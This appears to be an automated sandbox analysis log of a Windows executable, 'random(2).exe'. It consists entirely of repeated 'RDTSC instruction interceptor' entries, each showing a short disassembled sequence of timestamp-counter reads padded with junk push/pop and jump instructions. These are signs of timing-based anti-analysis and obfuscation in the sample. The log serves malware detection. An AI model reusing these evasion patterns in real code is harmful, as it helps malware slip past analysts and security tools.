Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 640564 second address: 640582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F294453553Ch 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jg 00007F2944535536h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 64886F second address: 648875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 648875 second address: 648879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 648879 second address: 64887F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 64887F second address: 64888B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 64888B second address: 648893 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 646C2A second address: 646C3E instructions: 0x00000000 rdtsc 0x00000002 je 00007F2944535536h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 646C3E second address: 646C48 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F29453582E2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 646F5C second address: 646F60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 646F60 second address: 646F64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 646F64 second address: 646F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 646F6A second address: 646F8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E8h 0x00000007 pushad 0x00000008 je 00007F29453582D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 646F8D second address: 646F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 64720C second address: 647212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 647212 second address: 647221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push edi 0x00000007 jnp 00007F2944535553h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 64828A second address: 648290 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 648290 second address: 64829B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F2944535536h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 64829B second address: 6482A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6482A8 second address: 6482AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6482AC second address: 6482BF instructions: 0x00000000 rdtsc 0x00000002 jc 00007F29453582D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6482BF second address: 6482C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6482C7 second address: 6482CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6482CC second address: 6482D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F2944535536h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6482D9 second address: 6482E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F29453582D6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6485A4 second address: 6485A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6485A8 second address: 6485AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 64D720 second address: 64D728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 64D728 second address: 64D742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29453582DFh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 64D742 second address: 64D756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2944535540h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 64D756 second address: 64D79A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E8h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F29453582D8h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 jl 00007F29453582FBh 0x0000001a jmp 00007F29453582E3h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 64D79A second address: 64D79E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 64CC1C second address: 64CC21 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 64CFF9 second address: 64D016 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535546h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 64D172 second address: 64D189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29453582E3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 64D464 second address: 64D468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 59D9A3 second address: 59D9AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 65A656 second address: 65A66F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jl 00007F294453553Ch 0x0000000b jbe 00007F294453553Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 65AA01 second address: 65AA14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 js 00007F29453582D6h 0x0000000c jg 00007F29453582D6h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 65AA14 second address: 65AA62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F2944535536h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c ja 00007F294453553Eh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 jmp 00007F294453553Eh 0x0000001c jmp 00007F294453553Eh 0x00000021 pop ecx 0x00000022 jns 00007F2944535542h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 65AA62 second address: 65AA68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 65AEC2 second address: 65AEC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 65AEC8 second address: 65AECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 65AFF2 second address: 65AFF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 65B1A5 second address: 65B1A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 65C1F2 second address: 65C1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 65A079 second address: 65A07F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 65A07F second address: 65A083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 65A083 second address: 65A0AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F29453582DBh 0x0000000e jmp 00007F29453582E1h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 65E880 second address: 65E886 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 65E886 second address: 65E894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F29453582DCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 65E894 second address: 65E898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6613D0 second address: 6613E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29453582DFh 0x00000009 jc 00007F29453582D6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6613E9 second address: 661409 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535548h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 661409 second address: 661417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29453582DAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 666368 second address: 666395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F294453553Ah 0x00000009 pop esi 0x0000000a jmp 00007F2944535549h 0x0000000f popad 0x00000010 push edi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 666395 second address: 6663B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29453582E4h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 670320 second address: 670324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 674939 second address: 674948 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F29453582D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 674698 second address: 6746B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2944535546h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 677654 second address: 67765A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 677014 second address: 67702F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535547h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 67702F second address: 677039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 677039 second address: 67703D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 67703D second address: 677043 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 68503B second address: 685052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2944535543h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 68668B second address: 68668F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 68668F second address: 686695 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 686695 second address: 68669F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F29453582D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 68669F second address: 6866A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 68939A second address: 6893A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6893A0 second address: 6893A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 689242 second address: 689249 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 690470 second address: 69047A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6905DD second address: 6905E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6905E3 second address: 6905F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F294453553Dh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6905F6 second address: 6905FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6905FC second address: 690619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F2944535543h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 690619 second address: 69061F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 690765 second address: 69076F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F2944535536h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 69076F second address: 690790 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F29453582DCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 697F29 second address: 697F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 697F2D second address: 697F31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 69ABAF second address: 69ABB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 69A8BD second address: 69A8C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 69A8C8 second address: 69A8D7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2944535536h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6A695C second address: 6A697A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F29453582E9h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 596DCD second address: 596DD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 596DD3 second address: 596DFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007F29453582D6h 0x0000000d jnl 00007F29453582D6h 0x00000013 jmp 00007F29453582E6h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 596DFD second address: 596E0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F294453553Bh 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6A67FE second address: 6A6818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jc 00007F29453582D6h 0x0000000e jl 00007F29453582D6h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6A6818 second address: 6A681E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6A681E second address: 6A683B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F29453582D6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F29453582DDh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6A683B second address: 6A6841 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 591C4C second address: 591C53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 591C53 second address: 591C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6B980B second address: 6B9814 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6C485F second address: 6C487E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2944535536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F2944535545h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6C36E1 second address: 6C36E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6C3B23 second address: 6C3B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6C3B27 second address: 6C3B2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6C3B2B second address: 6C3B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6C3B35 second address: 6C3B41 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jns 00007F29453582D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6C3F9C second address: 6C3FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6C3FA0 second address: 6C3FB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6C40EF second address: 6C4113 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push ecx 0x00000008 pushad 0x00000009 jmp 00007F2944535549h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 6C4113 second address: 6C4119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
